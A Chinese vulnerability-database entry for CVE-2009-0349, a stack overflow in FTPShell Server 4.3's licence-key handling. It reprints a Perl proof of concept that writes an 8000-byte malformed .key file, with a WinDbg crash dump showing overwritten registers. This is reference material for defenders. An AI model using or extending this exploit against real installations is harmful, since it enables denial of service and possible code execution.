FTPShell Server证书密钥文件处理栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117274 漏洞类型 缓冲区溢出
发布时间 2009-01-22 更新时间 2009-02-11
CVE编号 CVE-2009-0349 CNNVD-ID CNNVD-200901-445
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7852
https://www.securityfocus.com/bid/33403
https://cxsecurity.com/issue/WLB-2009010248
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-445
|漏洞详情
FTPShellServer是一款安全可靠的FTP客户端工具。FTPShellServer在处理畸形的证书密钥(.key)文件时存在栈溢出漏洞。如果用户受骗导入了大于8000字节的证书的话,就可能触发这个溢出,导致拒绝服务或执行任意代码。
|漏洞EXP
#!/usr/bin/perl
#
# Title: FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC
#
# Summary: FTPShell server is a windows FTP service that enables remote file downloads and uploads.
# It supports regular and secure FTP based on both SSL/TLS and SSH2. It is also extremely easy to
# configure and use.
#
# Product web page: http://www.ftpshell.com/index.htm
#
# Desc: FTPShell Server 4.3 suffers from buffer overflow vulnerability that can be exploited remotely or localy.
# It fails to perform adequate boundry condition of the input .key file, allowing us to overwrite the EAX and EDX
# registers. When trying to install licence with less than 8000 bytes we get a message: "It appears that your key
# file is corrupt or invalid.", but when installing a licence with 8000 bytes we get a message: "Your licence key
# has been succesfully loaded. Please restart the program."
#
# Note: When you restart the program, it will always crash untill you repair it or reinstall it.
#
#
# ---------------------------------WinDbg-------------------------------------
#
# (1178.1d4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00b159c0 ecx=00b159c0 edx=41414141 esi=00b1c630 edi=00000005
# eip=004039a0 esp=0012f3bc ebp=00000000 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# 
# ftpshelldscp+0x39a0:
# 004039a0 ff5210          call    dword ptr [edx+10h]  ds:0023:41414151=????????
#
# ----------------------------------------------------------------------------
#
#
# Tested on Microsoft Windows XP Professional SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail [w00t] com
#
# http://www.zeroscience.org
#
# 22.01.2009
#
####################################################################################


$file = "Yes_Man.key";

$payload = "\x41" x 8000; 

print "\n\n[-] Buffering malicious playlist file. Please wait...\r\n";

sleep (1);

open (key, ">./$file") || die "\nCan't open $file: $!";

print key "$payload";

close (key);

print "\n\n[+] File $file successfully created!\n\n\a";

# milw0rm.com [2009-01-22]
|受影响的产品
Codeorigin FTPShell Server 4.3
|参考资料

来源:MILW0RM
名称:7852
链接:http://www.milw0rm.com/exploits/7852
来源:SECUNIA
名称:33597
链接:http://secunia.com/advisories/33597
来源:OSVDB
名称:51510
链接:http://osvdb.org/51510